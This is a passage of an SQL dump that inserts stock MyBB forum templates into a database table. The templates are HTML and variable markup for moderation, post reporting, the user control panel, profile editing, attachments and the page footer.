value=\"multiunapprovethreads\">{$lang->unapprove_threads}</option>\n </optgroup>\n {$customthreadtools}\n</select>\n<input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->inline_go} ({$inlinecount})\" id=\"inline_go\" />&nbsp;\n<input type=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" class=\"button\" />\n</form>\n<script type=\"text/javascript\">\n<!--\n var go_text = \"{$lang->inline_go}\";\n var all_text = \"{$threadcount}\";\n var inlineType = \"forum\";\n var inlineId = {$fid};\n// -->\n</script>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('63', 'forumdisplay_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\">\n <td colspan=\"8\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td>\n</tr>\n<tr id=\"allSelectedrow\" class=\"hiddenrow\">\n <td colspan=\"8\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('64', 'search_threads_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\">\n <td colspan=\"8\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td>\n</tr>\n<tr id=\"allSelectedrow\" class=\"hiddenrow\">\n <td colspan=\"8\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('65', 'search_posts_inlinemoderation_selectall', '<tr id=\"selectAllrow\" class=\"hiddenrow\">\n <td colspan=\"9\" class=\"selectall\">{$lang->page_selected} <a href=\"#\" onclick=\'inlineModeration.selectAll();\'>{$lang->select_all}</a></td>\n</tr>\n<tr id=\"allSelectedrow\" class=\"hiddenrow\">\n <td colspan=\"9\" class=\"selectall\">{$lang->all_selected} <a href=\"#\" onclick=\'inlineModeration.clearChecked();\'>{$lang->clear_selection}</a></td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('66', 'report_thanks', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" align=\"center\">\n<br />\n<br />\n<strong>{$lang->thank_you}</strong>\n<blockquote>{$lang->post_reported}</blockquote>\n<br /><br />\n<div style=\"text-align: center;\">\n <script type=\"text/javascript\">\n <!--\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n // -->\n </script>\n</div>\n</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('67', 'report', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title>\n{$headerinclude}\n</head>\n<body>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\" align=\"center\">\n<br />\n<br />\n<strong>{$lang->report_to_mod}</strong>\n<form action=\"report.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_report\" />\n<input type=\"hidden\" name=\"pid\" value=\"{$pid}\" />\n<blockquote>{$lang->only_report}</blockquote>\n<br />\n<br />\n<span class=\"smalltext\">{$lang->report_reason}</span>\n<br />\n<input type=\"text\" class=\"textbox\" name=\"reason\" size=\"40\" maxlength=\"250\" />\n<br />\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->report_post}\" /></div>\n</form>\n</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('68', 'report_error', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><span class=\"smalltext\"><strong>{$mybb->settings[\'bbname\']}</strong></span></td>\n\n</tr>\n<tr>\n<td class=\"trow1\">{$error}</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '123', '', '1339729416'); INSERT INTO mybb_templates VALUES('69', 'redirect', '<html>\n<head>\n<title>{$title}</title>\n<meta http-equiv=\"refresh\" content=\"2;URL={$url}\" />\n{$headerinclude}\n</head>\n<body>\n<br />\n<br />\n<br />\n<br />\n<div style=\"margin: auto auto; width: {$lang->redirect_width}\" align=\"center\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$title}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\"><p>{$message}</p></td>\n</tr>\n<tr>\n<td class=\"trow2\" align=\"right\"><a href=\"{$url}\"><span class=\"smalltext\">{$lang->click_no_wait}</span></a></td>\n</tr>\n</table>\n</div>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('70', 'gobutton', '<input type=\"submit\" class=\"button\" value=\"{$lang->go}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('71', 'postbit_away', '<a href=\"{$post[\'profilelink_plain\']}\" title=\"{$lang->postbit_status_away}\"><img src=\"{$theme[\'imgdir\']}/buddy_away.gif\" border=\"0\" alt=\"{$lang->postbit_status_away}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('72', 'forumdisplay_thread_rating', '<td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" id=\"rating_table_{$thread[\'tid\']}\">\n <ul class=\"star_rating{$not_rated}\" id=\"rating_thread_{$thread[\'tid\']}\">\n <li style=\"width: {$thread[\'width\']}%\" class=\"current_rating\" id=\"current_rating_{$thread[\'tid\']}\">{$ratingvotesav}</li>\n </ul>\n <script type=\"text/javascript\">\n <!--\n Rating.build_forumdisplay({$thread[\'tid\']}, { width: \'{$thread[\'width\']}\', extra_class: \'{$not_rated}\', current_average: \'{$ratingvotesav}\' });\n // -->\n </script>\n </td>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('73', 'forumdisplay_announcement_rating', ' <td class=\"{$bgcolor}\" align=\"center\"><img src=\"{$theme[\'imgdir\']}/pixel.gif\" alt=\"\" /></td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('74', 'forumdisplay_password', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->password_required} </title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"{$_SERVER[\'REQUEST_URI\']}\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\" colspan=\"2\"><strong>{$lang->password_required}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" colspan=\"2\">{$lang->forum_password_note}</td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->enter_password_below}</strong></td>\n</tr>\n{$pwnote}\n<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><input type=\"password\" class=\"textbox\" name=\"pwverify\" size=\"50\" value=\"\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->verify_forum_password}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('75', 'error_maxsigimages', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->too_many_images}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$lang->too_many_sig_images}<br /><span class=\"smalltext\">{$lang->too_many_sig_images2}</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('76', 'forumbit_depth2_forum', '<tr>\n<td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td>\n<td class=\"{$bgcolor}\" valign=\"top\">\n<strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div>\n</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('77', 'forumbit_depth3', '{$comma}{$statusicon}<a href=\"{$forum_url}\" title=\"{$forum_viewers_text_plain}\">{$forum[\'name\']}</a>', '-2', '1404', '', '1339729416'); INSERT INTO mybb_templates VALUES('78', 'forumbit_depth3_statusicon', '<img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"subforumicon ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('79', 'forumbit_subforums', '<br />{$lang->subforums} {$sub_forums}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('80', 'private_empty', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->empty_folders}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->empty_folders}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"3\"><span class=\"smalltext\">{$lang->empty_note}</span></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->export_folder}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->num_messages}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->empty_q}</strong></td>\n</tr>\n{$folderlist}\n<tr>\n<td class=\"trow2\" align=\"center\" colspan=\"3\"><input type=\"checkbox\" class=\"checkbox\" name=\"keepunread\" value=\"1\" checked=\"checked\" /><strong>{$lang->keep_unread}</strong></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_empty\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('81', 'usercp', '<html>\n<head>\n<title>{$lang->user_cp}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td>\n</tr>\n<tr>\n{$avatar}\n<td class=\"trow2\">\n<span class=\"largetext\">{$username}</span><br />\n<strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br />\n{$reputation}\n<strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br />\n<strong>{$lang->registration_date}</strong> {$regdate}<br />\n<strong>{$lang->primary_usergroup}</strong> {$usergroup}<br />\n{$referral_info}\n</td>\n</tr>\n</table>\n{$latest_subscribed}\n{$latest_threads}\n{$latest_warnings}\n{$user_notepad}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('82', 'usercp_referrals', '<strong>{$lang->members_referred}</strong> {$mybb->user[\'referrals\']}<br />\n{$referral_link}', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('83', 'usercp_reputation', '<strong>{$lang->reputation}</strong> {$reputation_link} [<a href=\"reputation.php?uid={$mybb->user[\'uid\']}\">{$lang->details}</a>]<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('84', 'usercp_currentavatar', '<td class=\"trow1\" valign=\"middle\" align=\"center\" width=\"1\"><div class=\"usercp_container\"><img src=\"{$mybb->user[\'avatar\']}\" alt=\"{$mybb->user[\'username\']}\" title=\"{$mybb->user[\'username\']}\" {$avatar_width_height} /></div></td>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('85', 'footer', ' <br />\n <div class=\"bottommenu\">\n <div class=\"float_right\">{$lang_select}</div>\n <div>\n <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a></span>\n </div>\n </div>\n </div>\n <hr class=\"hidden\" />\n <div id=\"copyright\">\n <div id=\"debug\"><debugstuff></div>\n <!-- MyBB is free software developed and maintained by a volunteer community. \n It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, \n to show your support for MyBB. If you choose to remove or modify the copyright below, \n you may be refused support on the MyBB Community Forums.\n \n This is free software, support us and we\'ll support you. -->\n{$lang->powered_by} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB Group</a>.<br />\n <!-- End powered by -->\n <br />\n<br class=\"clear\" />\n<!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code -->\n{$auto_dst_detection}\n </div>\n </div>', '-2', '1413', '', '1339729416'); INSERT INTO mybb_templates VALUES('86', 'private_archive_csv', '{$lang->export_date_sent},{$lang->export_folder},{$lang->export_subject},{$lang->export_to},{$lang->export_from},{$lang->export_message}\n{$pmsdownload}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('87', 'usercp_profile_customtitle', '<fieldset class=\"trow2\">\n<legend><strong>{$lang->custom_usertitle}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td><span class=\"smalltext\">{$lang->custom_usertitle_note}</span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->default_usertitle}</span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\"><strong>{$defaulttitle}</strong></span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->current_custom_usertitle}</span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\"><strong>{$user[\'usertitle\']}</strong></span></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->new_custom_usertitle}</span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"usertitle\" size=\"25\" maxlength=\"{$mybb->settings[\'customtitlemaxlength\']}\" value=\"{$newtitle}\" /></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\"><input type=\"checkbox\" name=\"reverttitle\" id=\"reverttitle\" class=\"checkbox\" /> {$lang->revert_usertitle}</span></td>\n</tr>\n</table>\n</fieldset>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('88', 'usercp_attachments_none', '<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"5\">{$lang->no_attachments}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('89', 'usercp_nav_changename', '<div><a href=\"usercp.php?action=changename\" class=\"usercp_nav_item usercp_nav_username\">{$lang->ucp_nav_change_username}</a></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('90', 'usercp_profile', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td>\n</tr>\n<tr>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->profile_required}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->change_email_notice}</strong></span></td>\n</tr>\n{$requiredfields}\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->profile_optional}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td>\n</tr>\n<tr>\n<td>\n<select name=\"bday1\">\n<option value=\"\">&nbsp;</option>\n{$bdaydaysel}\n</select>\n</td>\n<td>\n<select name=\"bday2\">\n<option value=\"\">&nbsp;</option>\n<option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option>\n<option value=\"2\" {$bdaymonthsel[\'2\']}>{$lang->month_2}</option>\n<option value=\"3\" {$bdaymonthsel[\'3\']}>{$lang->month_3}</option>\n<option value=\"4\" {$bdaymonthsel[\'4\']}>{$lang->month_4}</option>\n<option value=\"5\" {$bdaymonthsel[\'5\']}>{$lang->month_5}</option>\n<option value=\"6\" {$bdaymonthsel[\'6\']}>{$lang->month_6}</option>\n<option value=\"7\" {$bdaymonthsel[\'7\']}>{$lang->month_7}</option>\n<option value=\"8\" {$bdaymonthsel[\'8\']}>{$lang->month_8}</option>\n<option value=\"9\" {$bdaymonthsel[\'9\']}>{$lang->month_9}</option>\n<option value=\"10\" {$bdaymonthsel[\'10\']}>{$lang->month_10}</option>\n<option value=\"11\" {$bdaymonthsel[\'11\']}>{$lang->month_11}</option>\n<option value=\"12\" {$bdaymonthsel[\'12\']}>{$lang->month_12}</option>\n</select>\n</td>\n<td>\n<input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"bday3\" value=\"{$bday[\'2\']}\" />\n</td>\n</tr>\n<tr>\n<td colspan=\"3\">\n<span class=\"smalltext\">{$lang->birthdayprivacy}</span>\n</td>\n</tr>\n<tr>\n<td colspan=\"3\">\n<select name=\"birthdayprivacy\">\n{$bdayprivacysel}\n</select>\n</td>\n</tr>\n<tr>\n<td colspan=\"3\"><span class=\"smalltext\">{$lang->website_url}</span></td>\n</tr>\n<tr>\n<td colspan=\"3\"><input type=\"text\" class=\"textbox\" name=\"website\" size=\"25\" maxlength=\"75\" value=\"{$user[\'website\']}\" /></td>\n</tr>\n</table>\n</fieldset>\n{$customfields}\n</td>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n{$customtitle}\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->additional_contact_details}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td><span class=\"smalltext\">{$lang->icq_number}</span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"icq\" size=\"25\" value=\"{$user[\'icq\']}\" /></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->aim_screenname}</span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"aim\" size=\"25\" value=\"{$user[\'aim\']}\" /></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->msn}</span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"msn\" size=\"25\" value=\"{$user[\'msn\']}\" /></td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->yahoo_id}</span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"yahoo\" size=\"25\" value=\"{$user[\'yahoo\']}\" /></td>\n</tr>\n</table>\n</fieldset>\n{$awaysection}\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_profile\" />\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_profile}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('91', 'post_attachments', '<br />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n <td class=\"thead\" colspan=\"3\"><strong>{$lang->attachments}</strong></td>\n</tr>\n<tr>\n <td class=\"tcat smalltext\" colspan=\"3\">{$lang->attach_quota} <a href=\"usercp.php?action=attachments\">{$lang->view_attachments}</a></td>\n</tr>\n{$newattach}\n{$attachments}\n</table>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('92', 'usercp_attachments', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->attachments_manager}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\" name=\"attachmentsmanager\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"5\"><strong>{$lang->attachments_manager} {$usagenote}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->attachments_attachment}</strong></span></td>\n<td class=\"tcat\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->attachments_post}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->date_uploaded}</strong></span></td>\n<td class=\"tcat\" width=\"1\"><input type=\"checkbox\" class=\"checkbox checkall\" /></td>\n</tr>\n{$attachments}\n</table>\n{$multipage}\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_attachments\" />\n<input type=\"submit\" class=\"button\" value=\"{$lang->delete_attachments}\" />\n</div>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->attachments_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_attachs}</strong></td>\n<td class=\"trow1\" width=\"60%\">{$totalattachments}</td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->attachstats_spaceused}</strong></td>\n<td class=\"trow2\" width=\"60%\">{$friendlyusage} ({$percent})</td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_quota}</strong></td>\n<td class=\"trow1\" width=\"60%\">{$attachquota}</td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->attachstats_totaldl}</strong></td>\n<td class=\"trow2\" width=\"60%\">{$totaldownloads}</td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->attachstats_bandwidth}</strong></td>\n<td class=\"trow1\" width=\"60%\">{$bandwidth}</td>\n</tr>\n</table>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('93', 'usercp_attachments_attachment', '<tr>\n<td class=\"{$altbg}\" width=\"1\">{$icon}</td>\n<td class=\"{$altbg}\" width=\"40%\"><a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a><br /><span class=\"smalltext\">{$sizedownloads}</span></td>\n<td class=\"{$altbg}\"><a href=\"{$attachment[\'postlink\']}#pid{$attachment[\'pid\']}\">{$attachment[\'subject\']}</a><br /><span class=\"smalltext\">{$lang->attachment_thread} <a href=\"{$attachment[\'threadlink\']}\">{$attachment[\'threadsubject\']}</a></span></td>\n<td class=\"{$altbg}\" align=\"center\">{$attachdate}, {$attachtime}</td>\n<td class=\"{$altbg}\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"attachments[{$attachment[\'aid\']}]\" value=\"{$attachment[\'aid\']}\" /></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('94', 'misc_rules_forum', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$forum[\'rulestitle\']}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"{$colspan}\"><strong>{$forum[\'rulestitle\']}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$forum[\'rules\']}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1210', '', '1339729416'); INSERT INTO mybb_templates VALUES('95', 'forumdisplay_rules', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$foruminfo[\'rulestitle\']}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$foruminfo[\'rules\']}</span></td>\n</tr>\n</table>\n<br />', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('96', 'forumdisplay_rules_link', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"trow1\"><strong><a href=\"misc.php?action=rules&amp;fid={$fid}\">{$foruminfo[\'rulestitle\']}</a></strong></td>\n</tr>\n</table>\n<br />', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('97', 'forumdisplay', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$foruminfo[\'name\']} </title>\n{$headerinclude}\n{$rssdiscovery}\n<script type=\"text/javascript\">\n<!--\n lang.no_new_posts = \"{$lang->no_new_posts}\";\n lang.click_mark_read = \"{$lang->click_mark_read}\";\n// -->\n</script>\n</head>\n<body>\n{$header}\n{$moderatedby}\n{$usersbrowsing}\n{$rules}\n{$subforums}\n{$threadslist}\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('98', 'member_register_referrer', '<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->referrer}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td><span class=\"smalltext\"><label for=\"referrer\">{$lang->referrer_desc}</label></span></td>\n</tr>\n<tr>\n<td>\n<input type=\"text\" class=\"textbox\" name=\"referrername\" id=\"referrer\" value=\"{$referrername}\" style=\"width: 100%;\" />\n</td>\n</tr></table>\n</fieldset>\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"referrer\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('99', 'usercp_usergroups_joingroup', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->request_join_usergroup}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" 